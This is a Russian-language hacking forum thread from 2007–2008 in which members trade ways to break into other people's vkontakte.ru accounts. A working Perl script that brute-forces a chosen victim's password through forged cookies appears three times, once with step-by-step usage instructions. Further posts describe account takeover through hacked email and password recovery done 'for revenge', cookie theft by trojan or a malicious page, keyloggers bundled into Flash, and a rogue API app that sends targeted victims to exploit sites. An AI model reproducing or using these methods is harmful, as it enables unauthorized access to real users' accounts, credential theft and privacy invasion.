VKONTAKTE.RU: ищем уязвимости, делимся опытом
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2007-07-31 02:42:59.516666
|
|
|
voody
Сообщений: 958
Оценки: 0
Присоединился: 2005-02-06 22:28:30
|
Сайт vkontakte.ru на данный момент является чуть ли не самым известным сайтом для общения студентов и школьников. Я зарегистрировался на нем пару месяцев назад и нашел там почти всех своих бывших одноклассников и просто людей, с которыми я раньше общался, но потом по каким-то причинам потерял с ними связь. Я знаю, что где-то пол года назад (на том же сайте, в какой-то группе о ней было написано) там была уязвимость, которая позволяла любому человеку, знающему ID пользователя, зайти в его аккаунт. Нужно было подправить в кукисах параметры remixid и remixemail на те, что были у пользователя и все, аккаунт твой. Но сейчас туда ввели еще и remixpass - хэш пароля. После этого, использовать уязвимость не представлялось возможным. Нет, был случай, когда я дал одному человеку троян, украл кукисы с винча и подставил значения, но это был взлом компьютера пользователя, а не сайта. Зачем я все это пишу: я предлагаю вместе искать уязвимости на этом сайте и выкладывать свои результаты сюда. Не обязательно пытаться ломать весь сайт. Во-первых, это сложно и занимает много времени. Во-вторых, если кто его и сломает - вряд ли поделиться информацией о том, как он это сделал (хотя, х.з., бывают и добрые люди). Я сейчас говорю, допустим, об XSS, или, о чем-нибудь в этом роде. Пишите сюда, кто заинтересован. Можно сайт вместе поковырять. Я думаю, что эта тема будет интересна достаточно большому кругу людей.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2007-07-31 18:17:13.223333
|
|
|
cataha01
Сообщений: 121
Оценки: 0
Присоединился: 2006-03-12 02:04:21
|
на чот тут есть хз http://forum.antichat.ru/thread45578.html
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2007-07-31 23:58:25.986666
|
|
|
voody
Сообщений: 958
Оценки: 0
Присоединился: 2005-02-06 22:28:30
|
Спасибо за ссылку, интересно. Проверил, работает ли метод с заменой e-mail'а на произвольный, оказалось, что да. Заменил свой e-mail в куках, перезагрузил страницу - я до сих пор был в своем аккаунте. С одной этой уязвимостью аккаунт, конечно, не вскроешь, но то, что не нужно узнавать адрес ящика, а нужен только пароль, уже радует. С флудером (тем, что в конце описан, с первым все более-менее ясно) пока не разбирался. Я Perl'а не знаю, было бы на PHP … Вообщем, кто-то откликнулся, уже хорошо. Народ, еще мысли есть? Может, кто XSS'ку найдет? Я, пока, что, их не видел, может, плохо искал.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2007-08-01 01:14:58.826666
|
|
|
nutsbutters
Сообщений: 6
Оценки: 0
Присоединился: 2007-07-31 05:44:36.626666
|
в контатке кстати есть группа, по поиску уязвимостей в проекте кажется <script>alert('xak')</script> или как то так называется :)
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2007-08-01 20:39:19.930000
|
|
|
asylum
Сообщений: 429
Оценки: 0
Присоединился: 2006-05-30 19:40:47
|
И вроде как на этом движке, на этой неделе дыру нашли
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-01-13 07:36:07.570000
|
|
|
voody
Сообщений: 958
Оценки: 0
Присоединился: 2005-02-06 22:28:30
|
Поднимаю тему. Может, кто-нибудь что-то новое нашел. Я пока ничего найти не могу.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-04 02:19:45.016666
|
|
|
Flight
Сообщений: 10
Оценки: 0
Присоединился: 2008-01-06 23:39:49.900000
|
http://q-zar.livejournal.com/151187.html Вот заходите почитайте статейку!! наверное всем будет интересна!!!
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-04 02:38:55.336666
|
|
|
Flight
Сообщений: 10
Оценки: 0
Присоединился: 2008-01-06 23:39:49.900000
|
view plaincopy to clipboardprint?#!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads ###################################### $dic = 'passl.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ###################################### open (pass, "<$dic"); next: @pass ="" pass(); for(0..$threads) {$trl[$_] ="" threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while (<pass>){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; } [/ol] [blockquote]$dic = ‘passl.txt’; #словарь паролей $id = 111111; #id цели $mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков [/blockquote] для начала: 1. тебе нужна прога ActivePerl 5.10.0.1001 я юзаю её. 2. потом из первого поста копируешь себе текст в текстовый файл… и меняешь id жертвы на нужное тебе. 3. переименуй файл из primer.txt в primer.pl 4. туда где лежит этот файл, скопируй файл со словарём, в данном примере это passl.txt 5. запускай файл, и радуйся… 6. создастся good.txt, где и будет твой пасс. http://www.softportal.com/get-70-activeperl.html —— ActivePerl 5.10.0.1001 Я это брал с какогото сайта уже не помню но отзывы были 100%!!!! Всем удачи!!!
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-04 02:41:04.636666
|
|
|
Flight
Сообщений: 10
Оценки: 0
Присоединился: 2008-01-06 23:39:49.900000
|
Чёт оно криво вставилось!!! Если кто хочет получить стучите в асю 356-811-887!! Дам подробную инфу!!
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-05 14:03:28.356666
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
Есть способ, он только для каждого пользователя отдельно, достаточно лишь знать мыло жертвы, "в контакте" есть функция восстановления пароля(как и на всех сайтах такого рода) но дело в том что система не выдаёт нам новый пароль, а она присылает старый. Кто не понял в чём фишка, пишу дальше… Нам нужно взломать мыло жертвы(каждый наверняка знает какой прогой это можно сделать) сломали мыло, заходим в почту(новые письма не читаем, а то пропалят) заходим "в контакт" вбиваем взломанное мыло, и восстанавливаем пароль на это мыло, получаем письмецо, быстренько списываем полученные данные, удаляем письмо, выходим. Вот и всё. Этот способ больше подходит для тех кто хочет кому то отомстить;)
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-05 15:42:19.310000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
мдаааа идея со взломом мыла меня ваще поразила……ну попробуй взломай мыльцо…….. кстати то что дано на античате канешно класс но много чего уже прикрыли…….
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-06 17:14:53.086666
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
Могу выложить для всего этого проги)))ну эт если не найдёте…))) а так вот сайтец с отличным софтом для любого взлома http://litaretti.ucoz.ru
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-06 18:02:28.550000
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
quote:
ORIGINAL: Flight view plaincopy to clipboardprint?#!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads ###################################### $dic = 'passl.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ###################################### open (pass, "<$dic"); next: @pass ="" pass(); for(0..$threads) {$trl[$_] ="" threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while (<pass>){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; } [/ol] [blockquote]$dic = ‘passl.txt’; #словарь паролей $id = 111111; #id цели $mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков [/blockquote] для начала: 1. тебе нужна прога ActivePerl 5.10.0.1001 я юзаю её. 2. потом из первого поста копируешь себе текст в текстовый файл… и меняешь id жертвы на нужное тебе. 3. переименуй файл из primer.txt в primer.pl 4. туда где лежит этот файл, скопируй файл со словарём, в данном примере это passl.txt 5. запускай файл, и радуйся… 6. создастся good.txt, где и будет твой пасс. http://www.softportal.com/get-70-activeperl.html —— ActivePerl 5.10.0.1001 Я это брал с какогото сайта уже не помню но отзывы были 100%!!!! Всем удачи!!! Баян, на форуме не первый раз постится, и мог бы если уж на то пошло, норм выложить, а не кракозяблины… quote:
ORIGINAL: _~eXe~_ Могу выложить для всего этого проги)))ну эт если не найдёте…))) а так вот сайтец с отличным софтом для любого взлома http://litaretti.ucoz.ru ыы) реклама=бан[sm=ag.gif] Зачем вам вообще этот контакт нужен? тупо посмотреть закрытые фотки и видео? ну получите базу мыл примерно в 15млн, из которых 75-80% валид(( На самом деле, контакт никакой особо ценной инфы не содержит… тем более соц сети разрушают мозг…
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-07 01:40:50.143333
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
Енто не реклама))))xD)) это просто ссылка)))), и я думаю первый раз обойдёмся предупреждением….:)))) а сайт хорош)))
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-07 02:25:48.356666
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
У меня есть такой банальный вопрос: как можно обойти вот эту защиту???? Ошибка Страница скрыта Пользователь предпочел скрыть эту страницу. Назад Кто хоть примеоно знает, плиз, отпишитесь! P.S Заранее спасибо)
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-12 18:49:59.220000
|
|
|
npixel4
Сообщений: 33
Оценки: 0
Присоединился: 2008-06-08 22:48:58.486666
|
ну лично как я узнавал…то никак…всё ухе прикрыли(((
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-13 22:20:24.656666
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
Ну вообще то я уже нашел прогу с помощью которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья. P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461 (Если у кого возникнут вопросы по пользованию прогой, пишите в личку)
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-13 22:26:44.026666
|
|
|
Chrek625
Сообщений: 188
Оценки: 0
Присоединился: 2008-01-09 23:49:05.073333
|
quote:
ORIGINAL: _~eXe~_ Ну вообще то я уже нашел прогу с помощью которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья. P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461 (Если у кого возникнут вопросы по пользованию прогой, пишите в личку) Слушай что то подозрительно а не склеяна ли программа с каким то вирусом?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-14 00:03:15.450000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
Ну вот возьми и проверь, поставь на виртуальную машину и снифером чекай, если идут куда пакеты значит трой, а если постараешься то узнаешь и куда эти отчеты летят…….
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-14 00:05:07.186666
|
|
|
maiel
Сообщений: 62
Оценки: 0
Присоединился: 2006-12-15 06:37:16
|
Зачем вредить народу??
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-14 00:31:02.986666
|
|
|
Chrek625
Сообщений: 188
Оценки: 0
Присоединился: 2008-01-09 23:49:05.073333
|
quote:
ORIGINAL: Jarull Ну вот возьми и проверь, поставь на виртуальную машину и снифером чекай, если идут куда пакеты значит трой, а если постараешься то узнаешь и куда эти отчеты летят……. Да нууу нафиг а я то думал что да как мне сделать я высказал своё мнение а не мпрашивал…
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-16 00:12:54.163333
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
quote:
ORIGINAL: Chrek625 quote:
ORIGINAL: _~eXe~_ Ну вообще то я уже нашел прогу с помощью которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья. P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461 (Если у кого возникнут вопросы по пользованию прогой, пишите в личку) Слушай что то подозрительно а не склеяна ли программа с каким то вирусом? Слушай!!! У тя чё башню снесло какой нафиг вирус!!! Наоборот выкладываешь хорошие вещи, а тут сразу выпендрос! Подозрительно!!!-НЕ КАЧАЙ, сиди и смотри как другие пользуются!!! А если бы он и был там! Руки что ли не там растут? Вирус удалить не сможешь? Ну и народ пошел…
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-19 22:38:58.166666
|
|
|
Zzzen
Сообщений: 6
Оценки: 0
Присоединился: 2008-03-10 06:46:13.303333
|
Скрипт работает просто, используется простой bruteforce (перебор вариантов), в этом скрипте перебор паролей, которые расположены в файле. Человек с руками может сделать из этого скрипта более модифицированный вариант. Так, что ловите. #!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads ###################################### $dic = 'passl.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ###################################### open (pass, "<$dic"); Next: @pass = pass(); for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while ( ){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; } Источник - форум Античата.ру
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-21 15:30:25.240000
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
Скриптик не плохой, но ты сам подумай процент попадания, и тя с этим скриптом в бан лист сразу, ты не первый кто такую версию выкладывает, "в контакте" тоже не дураки сидят, и тем более брут-эт долго
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-21 16:16:36.750000
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
Вроде по взлому этой сети уже всё сказано, хотя осталься последний способ, это MD5. На их сервере идёт шиврование пароля мд5 которое прописано в куках, хорошо что уже нашлись люди которые могут взломать эту систему шифрования, на нашем сайте много о нём сказано, юзайте поиск. P.S Если кто хочет подробное описание дейсвий взлома и ссылок, пищите.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-21 17:38:02.283333
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
quote:
ORIGINAL: _~eXe~_ Вроде по взлому этой сети уже всё сказано, хотя осталься последний способ, это MD5. На их сервере идёт шиврование пароля мд5 которое прописано в куках, хорошо что уже нашлись люди которые могут взломать эту систему шифрования, на нашем сайте много о нём сказано, юзайте поиск. P.S Если кто хочет подробное описание дейсвий взлома и ссылок, пищите. Куки еще украсть нужно… А разве есть хсс на сайте вконтакте? О_о Или каким способом предполагается похищать куки?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-22 01:41:12.410000
|
|
|
TurboXaker
Сообщений: 385
Оценки: 0
Присоединился: 2008-05-23 01:05:40.516666
|
quote:
Или каким способом предполагается похищать куки? http://www.viruslist.com/ru/weblog?discuss=207758696&return=1 в аналогичной статье было написано что вирус похищает куки => для похищения кук надо написать трой
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-22 01:57:32.533333
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
quote:
ORIGINAL: [ TRaY ] Куки еще украсть нужно… А разве есть хсс на сайте вконтакте? О_о Или каким способом предполагается похищать куки? Ну почему сразу хсс, есть же и куча других способов, XSS в контакте не пашит, можно написать скрипт который будет тащить куку(исходников в инете куча, а там уже сам редакть как хочешь) написать скрипт, создать php страничку, и кинуть жертве в личку или на доску(на доске еще кто нить поймается xD) а еще проще кинуть ссылку на keyloger и нет проблем
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-22 03:49:50.546666
|
|
|
webserfer2
Сообщений: 54
Оценки: 0
Присоединился: 2008-05-23 00:28:22.476666
|
Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно…
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-23 02:06:50.633333
|
|
|
FreeKing
Сообщений: 31
Оценки: 0
Присоединился: 2007-11-25 02:18:48.233333
|
Кстати, насчет API - там же, в отличие от простых ссылок на доске никаких "предупреждений о безопасности" не бывает - а прямо может редиректить на любой сайт… Что если написать простое безобидное приложение, тип прикола красочного или там открытки, в котором отслеживать, кто его смотрит. И если это жертва - редиректить ее на сниффер, сайт с експлоитом etc. - дальше думаю все понятно, а если не жертва - то не выполнять никаких хакерских действий. Так ее не запалят админы контакта - и в то же время жертва попадет куда нам надо - а там уже хоть XSS, хоть что.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-23 13:18:25.460000
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
http://www.viruslist.com/ru/weblog?discuss=207758696&return=1 и кто это интересно? Вам помочь чем нить ?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-24 01:22:36.850000
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
quote:
ORIGINAL: Derek_RED Вам помочь чем нить ? Да мы то можем и сами, а вот предложения по поводу взлома не помешают…))) Имеются таковые?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-24 01:29:23.580000
|
|
|
_~eXe~_
Сообщений: 14
Оценки: 0
Присоединился: 2008-06-05 01:52:02.263333
|
quote:
ORIGINAL: webserfer2 Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно… Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать)
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-24 04:02:43.603333
|
|
|
furiousangel
Сообщений: 1116
Оценки: 0
Присоединился: 2005-05-28 06:31:47
|
Где-то на ачате я видел линк на PoC XSS на vkontakte. Это flash приложение на VkontakteAPI.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-25 18:13:23.270000
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
http://vkontakte.ru/apps.php?act=s&id=151392
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-26 02:39:27.813333
|
|
|
trevan
Сообщений: 30
Оценки: 0
Присоединился: 2007-04-29 06:10:09.700000
|
Через комп мой заходил друг на сайт можно вытащить его пороль из компа если можно то как?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-26 13:37:56.686666
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
quote:
Через комп мой заходил друг на сайт можно вытащить его пороль из компа если можно то как? Читай форум……обо всем было сказано Биллион раз…..ну а если лень искать то вот те способ….берешь и скачиваешь программу Multi Password Recovery,запускаешь и она выдает тебе все пароли сохраненные на твоем компе…….за то что я сделал всю работу за тебя мож поставить +
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-27 02:43:35.330000
|
|
|
webserfer2
Сообщений: 54
Оценки: 0
Присоединился: 2008-05-23 00:28:22.476666
|
quote:
ORIGINAL: _~eXe~_ Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать) На actionscript реально что-то такое написать?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-28 18:29:53.736666
|
|
|
ZAmpol1T
Сообщений: 3
Оценки: 0
Присоединился: 2008-06-28 17:47:39.936666
|
quote:
ORIGINAL: _~eXe~_ quote:
ORIGINAL: webserfer2 Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно… Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать) уже давно пофиксили, теперь ядовитый .swf блочится уже на стадии загрузки его на сервер
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-29 01:32:07.770000
|
|
|
webserfer2
Сообщений: 54
Оценки: 0
Присоединился: 2008-05-23 00:28:22.476666
|
quote:
ORIGINAL: ZAmpol1T уже давно пофиксили, теперь ядовитый .swf блочится уже на стадии загрузки его на сервер А если сделать чтоб он его подгружал в процессе? Вполне безобидная флешка)
|
|
|
|
|